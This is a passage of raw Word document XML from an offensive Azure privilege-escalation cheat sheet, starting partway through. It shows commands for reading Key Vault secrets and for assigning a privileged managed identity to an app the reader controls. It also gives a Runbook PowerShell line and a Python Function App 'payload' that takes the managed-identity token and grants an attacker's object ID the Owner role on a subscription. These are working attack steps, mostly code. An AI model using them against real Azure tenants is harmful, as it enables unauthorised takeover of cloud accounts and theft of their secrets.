      <w:r w:rsidRPr="006464A7">
        <w:t>az keyvault secret show --vault-name &lt;vault-name&gt; --name &lt;secret-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567EAA14" w14:textId="77777777" w:rsidR="00993B89" w:rsidRDefault="00993B89" w:rsidP="00993B89"/>
    <w:p w14:paraId="544FACF0" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89"/>
    <w:p w14:paraId="0FAA4DB4" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006464A7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="006464A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 5. Assign Privileged Managed Identity to Resource You Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1373B60E" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006464A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Requirement</w:t>
      </w:r>
      <w:r w:rsidRPr="006464A7">
        <w:t>: Microsoft.ManagedIdentity/userAssignedIdentities/assign/action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591BEB62" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t>az webapp identity assign --name &lt;your-app-name&gt; --resource-group &lt;rg&gt; --identities &lt;privileged-identity-id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F220690" w14:textId="77777777" w:rsidR="00993B89" w:rsidRDefault="00993B89" w:rsidP="00993B89"/>
    <w:p w14:paraId="776294BB" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89"/>
    <w:p w14:paraId="1BF0C2A5" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006464A7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🪝</w:t>
      </w:r>
      <w:r w:rsidRPr="006464A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 6. Abusing Automation Runbook or Function App</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E67FF64" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t>If you control a Runbook/Function App with a system-assigned identity, you can inject code that assigns roles, lists secrets, or pivots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BD9C28" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerShell in Runbook:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631C9C0C" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:lastRenderedPageBreak/>
        <w:t># Add yourself to Owner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9B5964" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t>New-AzRoleAssignment -ObjectId "&lt;your-object-id&gt;" -RoleDefinitionName "Owner" -Scope "/subscriptions/&lt;sub-id&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C133C8" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Function App payload (Python):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEC736C" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t>import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5914C223" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t>token = requests.get("http://localhost:8080/msi/token?resource=https://management.azure.com/", headers={"Metadata": "true"}).json()['access_token']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6892A2" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t>headers = {'Authorization': f'Bearer {token}'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CE0321" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t>payload = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545ADE41" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t xml:space="preserve">  "properties": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0D5894" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t xml:space="preserve">    "roleDefinitionId": "/subscriptions/&lt;sub-id&gt;/providers/Microsoft.Authorization/roleDefinitions/&lt;owner-role-id&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440BEDFF" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t xml:space="preserve">    "principalId": "&lt;attacker-object-id&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B62D60" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF77845" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CDB1F9" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t>requests.put("https://management.azure.com/subscriptions/&lt;sub-id&gt;/providers/Microsoft.Authorization/roleAssignments/&lt;uuid&gt;?api-version=2022-04-01", json=payload, headers=headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3531A587" w14:textId="77777777" w:rsidR="00993B89" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CA8007D" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89"/>
    <w:p w14:paraId="180A635C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759"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E0FC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A6E2B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A64080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95675">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="84189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89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93B89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78CF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5AFE8D2E-034A-4663-9FF5-81975107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B89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89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89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89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89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89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8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993B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89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99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89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99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2026-04-06T04:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-06T04:45:00Z</dcterms:modified>
</cp:coreProperties>
</file>